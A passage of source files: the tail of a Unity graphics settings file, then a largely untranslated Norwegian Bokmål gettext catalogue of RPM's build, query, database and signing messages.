m_DefaultRenderingPath: 1
m_DefaultMobileRenderingPath: 1
m_TierSettings: []
m_LightmapStripping: 0
m_FogStripping: 0
m_InstancingStripping: 0
m_LightmapKeepPlain: 1
m_LightmapKeepDirCombined: 1
m_LightmapKeepDynamicPlain: 1
m_LightmapKeepDynamicDirCombined: 1
m_LightmapKeepShadowMask: 1
m_LightmapKeepSubtractive: 1
m_FogKeepLinear: 1
m_FogKeepExp: 1
m_FogKeepExp2: 1
m_AlbedoSwatchInfos: []
m_LightsUseLinearIntensity: 0
m_LightsUseColorTemperature: 0
m_LogWhenShaderIsCompiled: 0
| {
"pile_set_name": "Github"
} |
# SOME DESCRIPTIVE TITLE.
# Copyright (C) YEAR Free Software Foundation, Inc.
# This file is distributed under the same license as the PACKAGE package.
#
# Translators:
msgid ""
msgstr ""
"Project-Id-Version: PACKAGE VERSION\n"
"Report-Msgid-Bugs-To: [email protected]\n"
"POT-Creation-Date: 2020-08-20 13:58+0300\n"
"PO-Revision-Date: 2020-03-23 08:39-0400\n"
"Last-Translator: Copied by Zanata <[email protected]>\n"
"Language-Team: Norwegian Bokmål (http://www.transifex.com/rpm-team/rpm/"
"language/nb/)\n"
"Language: nb\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\n"
"X-Generator: Zanata 4.6.2\n"
#, c-format
msgid "%s: %s\n"
msgstr "%s: %s\n"
#, c-format
msgid "RPM version %s\n"
msgstr "RPM versjon %s\n"
#, c-format
msgid "Copyright (C) 1998-2002 - Red Hat, Inc.\n"
msgstr ""
#, c-format
msgid ""
"This program may be freely redistributed under the terms of the GNU GPL\n"
msgstr ""
#, c-format
msgid "creating a pipe for --pipe failed: %m\n"
msgstr ""
#, c-format
msgid "exec failed\n"
msgstr "kjøring feilet\n"
#, c-format
msgid "argument is not an RPM package\n"
msgstr "argumentet er ikke en RPM-pakke\n"
#, c-format
msgid "error reading header from package\n"
msgstr "feil under lesing av header fra pakke\n"
#, c-format
msgid "cannot re-open payload: %s\n"
msgstr "kan ikke gjenåpne \"payload\": %s\n"
#, c-format
msgid "files over 4GB not supported by cpio, use rpm2archive instead\n"
msgstr ""
#, c-format
msgid "buildroot already specified, ignoring %s\n"
msgstr "buildroot allerede oppgitt, ignorerer %s\n"
#, c-format
msgid "build through %prep (unpack sources and apply patches) from <specfile>"
msgstr ""
"bygg gjennom %prep (pakk ut kildekoden og legg til patcher) fra <specfil>"
msgid "<specfile>"
msgstr "<specfil>"
msgid "build through %build (%prep, then compile) from <specfile>"
msgstr ""
msgid "build through %install (%prep, %build, then install) from <specfile>"
msgstr ""
#, c-format
msgid "verify %files section from <specfile>"
msgstr ""
msgid "build source and binary packages from <specfile>"
msgstr "bygg kilde- og binærpakker fra <specfil>"
msgid "build binary package only from <specfile>"
msgstr "bygg kun binærpakke fra <specfil>"
msgid "build source package only from <specfile>"
msgstr ""
msgid ""
"build source package only from <specfile> - calculate dynamic build requires"
msgstr ""
#, c-format
msgid ""
"build through %prep (unpack sources and apply patches) from <source package>"
msgstr ""
msgid "<source package>"
msgstr "<kildepakke>"
msgid "build through %build (%prep, then compile) from <source package>"
msgstr ""
msgid ""
"build through %install (%prep, %build, then install) from <source package>"
msgstr ""
#, c-format
msgid "verify %files section from <source package>"
msgstr ""
msgid "build source and binary packages from <source package>"
msgstr ""
msgid "build binary package only from <source package>"
msgstr ""
msgid "build source package only from <source package>"
msgstr ""
msgid ""
"build source package only from <source package> - calculate dynamic build "
"requires"
msgstr ""
#, c-format
msgid "build through %prep (unpack sources and apply patches) from <tarball>"
msgstr ""
"bygg gjennom %prep (pakk ut kildekoden og legg til patcher) fra <tarball>"
msgid "<tarball>"
msgstr "<tarball>"
msgid "build through %build (%prep, then compile) from <tarball>"
msgstr ""
msgid "build through %install (%prep, %build, then install) from <tarball>"
msgstr ""
#, c-format
msgid "verify %files section from <tarball>"
msgstr "verifiser %files seksjon fra <tarball>"
msgid "build source and binary packages from <tarball>"
msgstr "bygg kilde- og binærpakker fra <tarball>"
msgid "build binary package only from <tarball>"
msgstr ""
msgid "build source package only from <tarball>"
msgstr ""
msgid ""
"build source package only from <tarball> - calculate dynamic build requires"
msgstr ""
msgid "build binary package from <source package>"
msgstr "bygg binær-pakke fra <kildepakke>"
msgid "override build root"
msgstr ""
msgid "run build in current directory"
msgstr ""
msgid "remove build tree when done"
msgstr "fjern byggtreet når ferdig"
msgid "ignore ExcludeArch: directives from spec file"
msgstr ""
msgid "debug file state machine"
msgstr ""
msgid "do not execute any stages of the build"
msgstr ""
msgid "do not verify build dependencies"
msgstr ""
msgid "generate package header(s) compatible with (legacy) rpm v3 packaging"
msgstr ""
#, c-format
msgid "do not execute %clean stage of the build"
msgstr ""
#, c-format
msgid "do not execute %prep stage of the build"
msgstr ""
#, c-format
msgid "do not execute %check stage of the build"
msgstr ""
msgid "do not accept i18N msgstr's from specfile"
msgstr ""
msgid "remove sources when done"
msgstr "fjern kildekoden når ferdig"
msgid "remove specfile when done"
msgstr ""
msgid "skip straight to specified stage (only for c,i)"
msgstr "hopp rett til spesifisert steg (kun for c,i)"
msgid "override target platform"
msgstr ""
msgid "Build options with [ <specfile> | <tarball> | <source package> ]:"
msgstr ""
msgid "Common options for all rpm modes and executables:"
msgstr ""
#, c-format
msgid "Unable to open spec file %s: %s\n"
msgstr "Kunne ikke åpne spec fil %s: %s\n"
#, c-format
msgid "Failed to open tar pipe: %m\n"
msgstr "Kunne ikke åpne tar-rør: %m\n"
#, c-format
msgid "Found more than one spec file in %s\n"
msgstr ""
#, c-format
msgid "Failed to read spec file from %s\n"
msgstr "Feil under lesing av spec-fil fra %s\n"
#, c-format
msgid "failed to stat %s: %m\n"
msgstr "kunne ikke kjøre stat på %s: %m\n"
#, c-format
msgid "File %s is not a regular file.\n"
msgstr "Fil %s er ikke en vanlig fil.\n"
#, c-format
msgid "File %s does not appear to be a specfile.\n"
msgstr "Fil %s ser ikke ut til å være en spec-fil.\n"
#, c-format
msgid "Building target platforms: %s\n"
msgstr "Bygger målplattformene: %s\n"
#, c-format
msgid "Building for target %s\n"
msgstr "Bygger for mål %s\n"
msgid "arguments to --root (-r) must begin with a /"
msgstr ""
msgid "initialize database"
msgstr "initier database"
msgid "rebuild database inverted lists from installed package headers"
msgstr "gjenoppbygg database inverterte lister fra installerte pakkers headere"
msgid "verify database files"
msgstr ""
#, fuzzy
msgid "salvage database"
msgstr "initier database"
msgid "export database to stdout header list"
msgstr ""
msgid "import database from stdin header list"
msgstr ""
msgid "Database options:"
msgstr ""
msgid "only one major mode may be specified"
msgstr "kun ett større modi kan spesifiseres"
msgid "verify package signature(s)"
msgstr ""
msgid "import an armored public key"
msgstr ""
msgid "don't import, but tell if it would work or not"
msgstr ""
msgid "list keys from RPM keyring"
msgstr ""
msgid "Keyring options:"
msgstr ""
msgid "no arguments given"
msgstr ""
msgid "Query/Verify package selection options:"
msgstr ""
msgid "Query/Verify file selection options:"
msgstr ""
msgid "Query options (with -q or --query):"
msgstr ""
msgid "Verify options (with -V or --verify):"
msgstr ""
msgid "Install/Upgrade/Erase options:"
msgstr ""
msgid "one type of query/verify may be performed at a time"
msgstr "én type spørring/verifisering kan utføres om gangen"
msgid "unexpected query flags"
msgstr "uventede flagg for spørring"
msgid "unexpected query format"
msgstr "uventet spørringsformat"
msgid "unexpected query source"
msgstr "uventet spørringskilde"
msgid "only installation and upgrading may be forced"
msgstr ""
msgid "files may only be relocated during package installation"
msgstr "filer kan kun omplasseres under pakkeinstallasjon"
msgid "cannot use --prefix with --relocate or --excludepath"
msgstr ""
msgid ""
"--relocate and --excludepath may only be used when installing new packages"
msgstr ""
"--relocate og --excludepath kan kun brukes ved installasjon av nye pakker"
msgid "--prefix may only be used when installing new packages"
msgstr "--prefix kan kun brukes ved installasjon av nye pakker"
msgid "arguments to --prefix must begin with a /"
msgstr "argumenter til --prefix må begynne med en /"
msgid ""
"--hash (-h) may only be specified during package installation and erasure"
msgstr ""
msgid "--percent may only be specified during package installation and erasure"
msgstr ""
msgid "--replacepkgs may only be specified during package installation"
msgstr ""
msgid "--excludedocs may only be specified during package installation"
msgstr ""
msgid "--includedocs may only be specified during package installation"
msgstr ""
msgid "only one of --excludedocs and --includedocs may be specified"
msgstr ""
msgid "--ignorearch may only be specified during package installation"
msgstr ""
msgid "--ignoreos may only be specified during package installation"
msgstr ""
msgid "--ignoresize may only be specified during package installation"
msgstr ""
msgid "--allmatches may only be specified during package erasure"
msgstr ""
msgid "--allfiles may only be specified during package installation"
msgstr ""
msgid "--justdb may only be specified during package installation and erasure"
msgstr ""
msgid ""
"script disabling options may only be specified during package installation "
"and erasure"
msgstr ""
"skript som slår av alternativer kan kun spesifiseres under pakkeinstallasjon "
"og sletting"
msgid ""
"trigger disabling options may only be specified during package installation "
"and erasure"
msgstr ""
"alternativer som slår av utløsing kan kun spesifiseres under "
"pakkeinstallasjon, og sletting"
msgid ""
"--nodeps may only be specified during package installation, erasure, and "
"verification"
msgstr ""
msgid "--test may only be specified during package installation and erasure"
msgstr ""
msgid "no packages given for erase"
msgstr ""
msgid "no packages given for install"
msgstr "ingen pakker oppgitt for installering"
msgid "no arguments given for query"
msgstr "ingen argumenter oppgitt for spørring"
msgid "no arguments given for verify"
msgstr "ingen argumenter oppgitt for verifisering"
msgid "sign package(s)"
msgstr ""
msgid "sign package(s) (identical to --addsign)"
msgstr ""
msgid "delete package signatures"
msgstr ""
msgid "create rpm v3 header+payload signatures"
msgstr ""
msgid "sign package(s) files"
msgstr ""
msgid "use file signing key <key>"
msgstr ""
msgid "<key>"
msgstr ""
msgid "prompt for file signing key password"
msgstr ""
msgid "Signature options:"
msgstr ""
#, c-format
msgid "You must set \"%%_gpg_name\" in your macro file\n"
msgstr ""
#, c-format
msgid ""
"You must set \"%%_file_signing_key\" in your macro file or on the command "
"line with --fskpath\n"
msgstr ""
msgid "--fskpath may only be specified when signing files"
msgstr ""
msgid "parse spec file(s) to stdout"
msgstr ""
msgid "query spec file(s)"
msgstr ""
msgid "operate on binary rpms generated by spec (default)"
msgstr ""
msgid "operate on binary rpms that would be built from spec"
msgstr ""
msgid "operate on source rpm generated by spec"
msgstr ""
msgid "use the following query format"
msgstr ""
msgid "Spec options:"
msgstr ""
msgid "no arguments given for parse"
msgstr ""
msgid "unable to parse SOURCE_DATE_EPOCH\n"
msgstr ""
#, c-format
msgid "Could not canonicalize hostname: %s\n"
msgstr ""
#, c-format
msgid "Unable to open temp file: %s\n"
msgstr ""
#, c-format
msgid "Unable to open stream: %s\n"
msgstr ""
#, c-format
msgid "Executing(%s): %s\n"
msgstr "Kjører(%s): %s\n"
#, c-format
msgid "Bad exit status from %s (%s)\n"
msgstr "Ugyldig sluttstatus fra %s (%s)\n"
msgid "Failed build dependencies:\n"
msgstr ""
#, c-format
msgid "setting %s=%s\n"
msgstr ""
msgid ""
"\n"
"\n"
"RPM build errors:\n"
msgstr ""
"\n"
"\n"
"RPM-feil under bygging:\n"
#, c-format
msgid "Missing '(' in %s %s\n"
msgstr "Mangler '(' i %s %s\n"
#, c-format
msgid "Missing ')' in %s(%s\n"
msgstr "Mangler ')' i %s(%s\n"
#, c-format
msgid "Invalid %s token: %s\n"
msgstr "Ugyldig %s-tegn: %s\n"
#, c-format
msgid "Missing %s in %s(%s)\n"
msgstr ""
#, c-format
msgid "Non-white space follows %s(): %s\n"
msgstr ""
#, c-format
msgid "Bad syntax: %s(%s)\n"
msgstr ""
#, c-format
msgid "Bad mode spec: %s(%s)\n"
msgstr ""
#, c-format
msgid "Bad dirmode spec: %s(%s)\n"
msgstr ""
#, c-format
msgid "Unusual locale length: \"%s\" in %%lang(%s)\n"
msgstr ""
#, c-format
msgid "Duplicate locale %s in %%lang(%s)\n"
msgstr ""
#, c-format
msgid "Invalid capability: %s\n"
msgstr ""
msgid "File capability support not built in\n"
msgstr ""
#, c-format
msgid "File must begin with \"/\": %s\n"
msgstr "Filen må begynne med \"/\": %s\n"
#, c-format
msgid "unable to parse %s=%s\n"
msgstr ""
#, c-format
msgid "Unknown file digest algorithm %u, falling back to MD5\n"
msgstr ""
#, c-format
msgid "File listed twice: %s\n"
msgstr "Fil listet to ganger: %s\n"
#, c-format
msgid "reading symlink %s failed: %s\n"
msgstr ""
#, c-format
msgid "absolute symlink: %s -> %s\n"
msgstr ""
#, c-format
msgid "Symlink points to BuildRoot: %s -> %s\n"
msgstr "Symbolsk lenke peker til BuildRoot: %s -> %s\n"
#, c-format
msgid "Illegal character (0x%x) in filename: %s\n"
msgstr ""
#, c-format
msgid "Path is outside buildroot: %s\n"
msgstr ""
#, c-format
msgid "Directory not found: %s\n"
msgstr ""
#, c-format
msgid "File not found: %s\n"
msgstr "Fil ikke funnet: %s\n"
#, c-format
msgid "Not a directory: %s\n"
msgstr ""
#, fuzzy, c-format
msgid "Can't read content of file: %s\n"
msgstr "%s: lesing av manifest feilet: %s\n"
#, c-format
msgid "%s: can't load unknown tag (%d).\n"
msgstr ""
#, c-format
msgid "%s: public key read failed.\n"
msgstr ""
#, c-format
msgid "%s: not an armored public key.\n"
msgstr ""
#, c-format
msgid "%s: failed to encode\n"
msgstr ""
msgid "failed symlink"
msgstr ""
#, c-format
msgid "Duplicate build-id, stat %s: %m\n"
msgstr ""
#, c-format
msgid "Duplicate build-ids %s and %s\n"
msgstr ""
msgid "_build_id_links macro not set, assuming 'compat'\n"
msgstr ""
#, c-format
msgid "_build_id_links macro set to unknown value '%s'\n"
msgstr ""
#, c-format
msgid "error reading build-id in %s: %s\n"
msgstr ""
#, c-format
msgid "Missing build-id in %s\n"
msgstr ""
#, c-format
msgid "build-id found in %s too small\n"
msgstr ""
#, c-format
msgid "build-id found in %s too large\n"
msgstr ""
msgid "failed to create directory"
msgstr ""
msgid "Mixing main ELF and debug files in package"
msgstr ""
#, c-format
msgid "File needs leading \"/\": %s\n"
msgstr ""
#, c-format
msgid "%%dev glob not permitted: %s\n"
msgstr ""
#, c-format
msgid "Directory not found by glob: %s. Trying without globbing.\n"
msgstr ""
#, c-format
msgid "File not found by glob: %s. Trying without globbing.\n"
msgstr ""
#, fuzzy, c-format
msgid "Could not open %s file %s: %m\n"
msgstr "Kunne ikke åpne %s: %s\n"
#, fuzzy, c-format
msgid "Empty %s file %s\n"
msgstr "feil under åpning av %s: %s\n"
#, c-format
msgid "illegal _docdir_fmt %s: %s\n"
msgstr ""
#, c-format
msgid "File not found by glob: %s\n"
msgstr ""
#, c-format
msgid "Special file in generated file list: %s\n"
msgstr ""
#, c-format
msgid "Can't mix special %s with other forms: %s\n"
msgstr ""
#, c-format
msgid "More than one file on a line: %s\n"
msgstr ""
msgid "Generating build-id links failed\n"
msgstr ""
#, c-format
msgid "Bad file: %s: %s\n"
msgstr "Ugyldig fil %s: %s\n"
#, c-format
msgid "Checking for unpackaged file(s): %s\n"
msgstr ""
#, c-format
msgid ""
"Installed (but unpackaged) file(s) found:\n"
"%s"
msgstr ""
#, fuzzy, c-format
msgid "package %s already exists\n"
msgstr "pakke %s er allerede installert"
#, c-format
msgid "%s was mapped to multiple filenames"
msgstr ""
#, c-format
msgid "Processing files: %s\n"
msgstr ""
#, c-format
msgid "Binaries arch (%d) not matching the package arch (%d).\n"
msgstr ""
msgid "Arch dependent binaries in noarch package\n"
msgstr ""
#, c-format
msgid "create archive failed on file %s: %s\n"
msgstr ""
#, c-format
msgid "create archive failed: %s\n"
msgstr ""
#, c-format
msgid "Unknown payload compression: %s\n"
msgstr ""
#, c-format
msgid "Could not seek in file %s: %s\n"
msgstr ""
#, c-format
msgid "Failed to read %jd bytes in file %s: %s\n"
msgstr ""
msgid "Unable to create immutable header region\n"
msgstr ""
#, c-format
msgid "Unable to write header to %s: %s\n"
msgstr ""
#, c-format
msgid "Could not open %s: %s\n"
msgstr "Kunne ikke åpne %s: %s\n"
#, c-format
msgid "Unable to write package: %s\n"
msgstr "Kunne ikke skrive pakke: %s\n"
#, c-format
msgid "Wrote: %s\n"
msgstr "Skrev: %s\n"
#, c-format
msgid "Executing \"%s\":\n"
msgstr ""
#, c-format
msgid "Execution of \"%s\" failed.\n"
msgstr ""
#, c-format
msgid "Package check \"%s\" failed.\n"
msgstr ""
#, c-format
msgid "cannot create %s: %s\n"
msgstr ""
#, c-format
msgid "Could not generate output filename for package %s: %s\n"
msgstr ""
#, c-format
msgid "Finished binary package job, result %d, filename %s\n"
msgstr ""
#, c-format
msgid "line %d: second %s\n"
msgstr ""
#, c-format
msgid "bogus date in %%changelog: %s\n"
msgstr ""
#, c-format
msgid "%%changelog entries must start with *\n"
msgstr ""
#, c-format
msgid "incomplete %%changelog entry\n"
msgstr ""
#, c-format
msgid "bad date in %%changelog: %s\n"
msgstr ""
#, c-format
msgid "%%changelog not in descending chronological order\n"
msgstr ""
#, c-format
msgid "missing name in %%changelog\n"
msgstr ""
#, c-format
msgid "no description in %%changelog\n"
msgstr ""
#, c-format
msgid "line %d: second %%changelog\n"
msgstr ""
#, c-format
msgid "line %d: Error parsing %%description: %s\n"
msgstr ""
#, c-format
msgid "line %d: Bad option %s: %s\n"
msgstr "linje %d: Ugyldig flagg %s: %s\n"
#, c-format
msgid "line %d: Too many names: %s\n"
msgstr ""
#, c-format
msgid "line %d: Error parsing %%files: %s\n"
msgstr "linje %d: Feil under lesing av %%filer: %s\n"
#, c-format
msgid "line %d: multiple %%files for package '%s'\n"
msgstr ""
#, c-format
msgid "line %d: Error parsing %%policies: %s\n"
msgstr ""
#, c-format
msgid "Error parsing tag field: %s\n"
msgstr ""
#, c-format
msgid "line %d: Bad number: %s\n"
msgstr "linje %d: Ugyldig nummer: %s\n"
#, c-format
msgid "line %d: Bad no%s number: %u\n"
msgstr ""
#, c-format
msgid "Downloading %s to %s\n"
msgstr ""
#, c-format
msgid "Couldn't download %s\n"
msgstr ""
#, c-format
msgid "line %d: Bad %s number: %s\n"
msgstr "linje %d: Ugyldig %s-nummer: %s\n"
#, c-format
msgid "%s %d defined multiple times\n"
msgstr ""
#, c-format
msgid "Architecture is excluded: %s\n"
msgstr ""
#, c-format
msgid "Architecture is not included: %s\n"
msgstr ""
#, c-format
msgid "OS is excluded: %s\n"
msgstr ""
#, c-format
msgid "OS is not included: %s\n"
msgstr ""
#, c-format
msgid "%s field must be present in package: %s\n"
msgstr "%s-felt må være tilstede i pakken: %s\n"
#, c-format
msgid "Duplicate %s entries in package: %s\n"
msgstr ""
#, c-format
msgid "Unable to open icon %s: %s\n"
msgstr "Kunne ikke åpne ikon %s: %s\n"
#, c-format
msgid "Unable to read icon %s: %s\n"
msgstr "Kan ikke lese ikon %s: %s\n"
#, c-format
msgid "Unknown icon type: %s\n"
msgstr "Ukjent ikontype: %s\n"
#, c-format
msgid "line %d: Tag takes single token only: %s\n"
msgstr "linje %d: Tagg tar kun et enkelt tegn: %s\n"
#, c-format
msgid "line %d: %s in: %s\n"
msgstr ""
#, c-format
msgid "%s in: %s\n"
msgstr ""
#, c-format
msgid "Illegal char '%c' (0x%x)"
msgstr ""
msgid "Possible unexpanded macro"
msgstr ""
msgid "Illegal sequence \"..\""
msgstr ""
#, c-format
msgid "line %d: Malformed tag: %s\n"
msgstr "linje %d: Feilutformet tagg: %s\n"
#, c-format
msgid "line %d: Empty tag: %s\n"
msgstr "linje %d: Tom tagg: %s\n"
#, c-format
msgid "line %d: Prefixes must not end with \"/\": %s\n"
msgstr "linje %d: Prefiks må ikke slutte på \"/\": %s\n"
#, c-format
msgid "line %d: Docdir must begin with '/': %s\n"
msgstr "linje %d: Docdir må begynne med '/': %s\n"
#, c-format
msgid "line %d: Epoch field must be an unsigned number: %s\n"
msgstr ""
#, c-format
msgid "line %d: Bad %s: qualifiers: %s\n"
msgstr "linje %d: Ugyldig %s: kvalifikatorer: %s\n"
#, c-format
msgid "line %d: Bad BuildArchitecture format: %s\n"
msgstr "linje %d: Ugyldig BuildArchitecture format: %s\n"
#, c-format
msgid "line %d: Duplicate BuildArch entry: %s\n"
msgstr ""
#, c-format
msgid "line %d: Only noarch subpackages are supported: %s\n"
msgstr ""
#, c-format
msgid "Internal error: Bogus tag %d\n"
msgstr "Intern feil: Ugyldig tag %d\n"
#, c-format
msgid "line %d: %s is deprecated: %s\n"
msgstr ""
#, c-format
msgid "Bad package specification: %s\n"
msgstr "Ugyldig pakkespesifikasjon: %s\n"
msgid "Binary rpm package found. Expected spec file!\n"
msgstr ""
#, c-format
msgid "line %d: Unknown tag: %s\n"
msgstr "linje %d: Ukjent tagg: %s\n"
#, c-format
msgid "%%{buildroot} couldn't be empty\n"
msgstr ""
#, c-format
msgid "%%{buildroot} can not be \"/\"\n"
msgstr ""
#, c-format
msgid "Bad source: %s: %s\n"
msgstr "Ugyldig kilde: %s: %s\n"
#, c-format
msgid "No patch number %u\n"
msgstr ""
#, c-format
msgid "No source number %u\n"
msgstr ""
#, c-format
msgid "Error parsing %%setup: %s\n"
msgstr "Feil under lesing av %%setup: %s\n"
#, c-format
msgid "line %d: Bad arg to %%setup: %s\n"
msgstr "linje %d: Ugyldig argument til %%setup: %s\n"
#, c-format
msgid "line %d: Bad %%setup option %s: %s\n"
msgstr "linje %d: Ugyldig %%setup flagg %s: %s\n"
#, c-format
msgid "%s: %s: %s\n"
msgstr ""
#, c-format
msgid "Invalid patch number %s: %s\n"
msgstr ""
#, c-format
msgid "line %d: second %%prep\n"
msgstr "linje %d: %%prep for andre gang\n"
msgid "Dependency tokens must begin with alpha-numeric, '_' or '/'"
msgstr ""
msgid "Versioned file name not permitted"
msgstr ""
msgid "No rich dependencies allowed for this type"
msgstr ""
msgid "invalid dependency"
msgstr ""
msgid "Version required"
msgstr ""
msgid "Only package names are allowed in Obsoletes"
msgstr ""
msgid "It's not recommended to have unversioned Obsoletes"
msgstr ""
msgid "It's not recommended to use '>' in Obsoletes"
msgstr ""
msgid "Only absolute paths are allowed in file triggers"
msgstr ""
msgid "Trigger fired by the same package is already defined in spec file"
msgstr ""
#, c-format
msgid "line %d: %s: %s\n"
msgstr ""
#, c-format
msgid "line %d: triggers must have --: %s\n"
msgstr "linje %d: triggere må ha --: %s\n"
#, c-format
msgid "line %d: missing trigger condition: %s\n"
msgstr ""
#, c-format
msgid "line %d: Error parsing %s: %s\n"
msgstr "linje %d: Feil under lesing av %s: %s\n"
#, c-format
msgid "line %d: internal script must end with '>': %s\n"
msgstr ""
#, c-format
msgid "line %d: script program must begin with '/': %s\n"
msgstr "linje %d: skriptprogram må begynne med '/': %s\n"
#, c-format
msgid "line %d: Priorities are allowed only for file triggers : %s\n"
msgstr ""
#, c-format
msgid "line %d: Second %s\n"
msgstr "linje %d: Andre %s\n"
#, c-format
msgid "line %d: unsupported internal script: %s\n"
msgstr ""
#, c-format
msgid "line %d: file trigger condition must begin with '/': %s"
msgstr ""
#, c-format
msgid "line %d: interpreter arguments not allowed in triggers: %s\n"
msgstr ""
#, c-format
msgid "extra tokens at the end of %s directive in line %d: %s\n"
msgstr ""
#, c-format
msgid "Macro expanded in comment on line %d: %s\n"
msgstr ""
#, c-format
msgid "Unable to open %s: %s\n"
msgstr "Kan ikke åpne %s: %s\n"
#, c-format
msgid "%s:%d: Argument expected for %s\n"
msgstr ""
#, c-format
msgid "line %d: Unclosed %%if\n"
msgstr ""
#, c-format
msgid "line %d: unclosed macro or bad line continuation\n"
msgstr ""
#, c-format
msgid "%s: line %d: %s with no %%if\n"
msgstr ""
#, c-format
msgid "%s: line %d: %s after %s\n"
msgstr ""
#, c-format
msgid "%s:%d: bad %s condition: %s\n"
msgstr ""
#, c-format
msgid "%s:%d: malformed %%include statement\n"
msgstr ""
#, c-format
msgid "encoding %s not supported by system\n"
msgstr ""
#, c-format
msgid "Package %s: invalid %s encoding in %s: %s - %s\n"
msgstr ""
#, c-format
msgid "line %d: %%end doesn't take any arguments: %s\n"
msgstr ""
#, c-format
msgid "line %d: %%end not expected here, no section to close: %s\n"
msgstr ""
#, c-format
msgid "line %d doesn't belong to any section: %s\n"
msgstr ""
msgid "No compatible architectures found for build\n"
msgstr "Ingen kompatible arkitekturer funnet for bygging\n"
#, c-format
msgid "Package has no %%description: %s\n"
msgstr "Pakken har ingen %%description: %s\n"
#, c-format
msgid "Policy module '%s' duplicated with overlapping types\n"
msgstr ""
#, c-format
msgid "Base modules '%s' and '%s' have overlapping types\n"
msgstr ""
msgid "Failed to get policies from header\n"
msgstr ""
#, c-format
msgid "%%semodule requires a file path\n"
msgstr ""
#, c-format
msgid "Failed to read policy file: %s\n"
msgstr ""
#, c-format
msgid "Failed to encode policy file: %s\n"
msgstr ""
#, c-format
msgid "Failed to determine a policy name: %s\n"
msgstr ""
#, c-format
msgid ""
"'%s' type given with other types in %%semodule %s. Compacting types to "
"'%s'.\n"
msgstr ""
#, c-format
msgid "Error parsing %s: %s\n"
msgstr ""
#, c-format
msgid "Expecting %%semodule tag: %s\n"
msgstr ""
#, c-format
msgid "Missing module path in line: %s\n"
msgstr ""
#, c-format
msgid "Too many arguments in line: %s\n"
msgstr ""
#, c-format
msgid "Processing policies: %s\n"
msgstr ""
#, c-format
msgid "Ignoring invalid regex %s\n"
msgstr ""
#, c-format
msgid "%s: mime and magic supplied, only mime will be used\n"
msgstr ""
#, c-format
msgid "Couldn't create pipe for %s: %m\n"
msgstr ""
#, c-format
msgid "Couldn't fork %s: %s\n"
msgstr "kunne ikke kjøre fork på %s: %s\n"
#, c-format
msgid "Couldn't exec %s: %s\n"
msgstr "Kunne ikke kjøre %s: %s\n"
#, c-format
msgid "%s failed: %x\n"
msgstr ""
#, c-format
msgid "failed to write all data to %s: %s\n"
msgstr ""
msgid "Empty file classifier\n"
msgstr ""
msgid "No file attributes configured\n"
msgstr ""
#, c-format
msgid "magic_open(0x%x) failed: %s\n"
msgstr ""
#, c-format
msgid "magic_load failed: %s\n"
msgstr ""
#, c-format
msgid "Recognition of file \"%s\" failed: mode %06o %s\n"
msgstr ""
#, c-format
msgid "Finding %s: %s\n"
msgstr ""
#, c-format
msgid "Failed to find %s:\n"
msgstr "Klarte ikke å finne %s:\n"
msgid "Deprecated external dependency generator is used!\n"
msgstr ""
#, c-format
msgid "line %d: %s: package %s does not exist\n"
msgstr ""
#, c-format
msgid "line %d: %s: package %s already exists\n"
msgstr ""
#, c-format
msgid "query of specfile %s failed, can't parse\n"
msgstr ""
#, c-format
msgid "%s error(%d) from %s: %s\n"
msgstr ""
#, c-format
msgid "%s error(%d): %s\n"
msgstr ""
#, c-format
msgid "unrecognized db option: \"%s\" ignored.\n"
msgstr ""
#, c-format
msgid "%s has invalid numeric value, skipped\n"
msgstr ""
#, c-format
msgid "%s has too large or too small long value, skipped\n"
msgstr ""
#, c-format
msgid "%s has too large or too small integer value, skipped\n"
msgstr ""
#, c-format
msgid "cannot get %s lock on %s/%s\n"
msgstr ""
msgid "shared"
msgstr ""
msgid "exclusive"
msgstr ""
#, c-format
msgid "invalid index type %x on %s/%s\n"
msgstr ""
#, c-format
msgid "error(%d) getting \"%s\" records from %s index: %s\n"
msgstr ""
#, c-format
msgid "error(%d) storing record \"%s\" into %s\n"
msgstr ""
#, c-format
msgid "error(%d) removing record \"%s\" from %s\n"
msgstr ""
#, c-format
msgid "error(%d) adding header #%d record\n"
msgstr ""
#, c-format
msgid "error(%d) removing header #%d record\n"
msgstr ""
#, c-format
msgid "error(%d) allocating new package instance\n"
msgstr ""
#, c-format
msgid "Converting database from %s to %s backend\n"
msgstr ""
#, c-format
msgid "Found %s %s database while attempting %s backend: using %s backend.\n"
msgstr ""
msgid "Detected outdated index databases\n"
msgstr ""
msgid "Rebuilding outdated index databases\n"
msgstr ""
#, c-format
msgid "rpmidx: Version mismatch. Expected version: %u. Found version: %u\n"
msgstr ""
#, c-format
msgid "rpmpkg: Version mismatch. Expected version: %u. Found version: %u\n"
msgstr ""
msgid "rpmpkg: detected non-zero blob, trying auto repair\n"
msgstr ""
#, c-format
msgid "rpmxdb: Version mismatch. Expected version: %u. Found version: %u\n"
msgstr ""
#, fuzzy, c-format
msgid "Unable to open sqlite database %s: %s\n"
msgstr "Kunne ikke åpne spec fil %s: %s\n"
#, c-format
msgid "%s is a Delta RPM and cannot be directly installed\n"
msgstr ""
#, c-format
msgid "Unsupported payload (%s) in package %s\n"
msgstr ""
#, c-format
msgid "package %s was already added, skipping %s\n"
msgstr ""
#, c-format
msgid "package %s was already added, replacing with %s\n"
msgstr ""
msgid "(not a blob)"
msgstr ""
msgid "(not a number)"
msgstr ""
msgid "(not a string)"
msgstr ""
msgid "(invalid type)"
msgstr ""
#, c-format
msgid "%c"
msgstr ""
msgid "%a %b %d %Y"
msgstr ""
msgid "(not base64)"
msgstr ""
msgid "(invalid xml type)"
msgstr ""
msgid "(not an OpenPGP signature)"
msgstr ""
#, c-format
msgid "Invalid date %u"
msgstr ""
msgid "normal"
msgstr ""
msgid "replaced"
msgstr ""
msgid "not installed"
msgstr ""
msgid "net shared"
msgstr ""
msgid "wrong color"
msgstr ""
msgid "missing"
msgstr ""
msgid "(unknown)"
msgstr ""
#, c-format
msgid "%s saved as %s\n"
msgstr "%s lagret som %s\n"
#, c-format
msgid "%s created as %s\n"
msgstr "%s opprettet som %s\n"
#, c-format
msgid "%s %s: remove failed: %s\n"
msgstr ""
msgid "directory"
msgstr ""
msgid "file"
msgstr ""
#, c-format
msgid "tag[%d]: BAD, tag %d type %d offset %d count %d len %d"
msgstr ""
msgid "hdr load: BAD"
msgstr ""
msgid "region: no tags"
msgstr ""
#, c-format
msgid "region tag: BAD, tag %d type %d offset %d count %d"
msgstr ""
#, c-format
msgid "region offset: BAD, tag %d type %d offset %d count %d"
msgstr ""
#, c-format
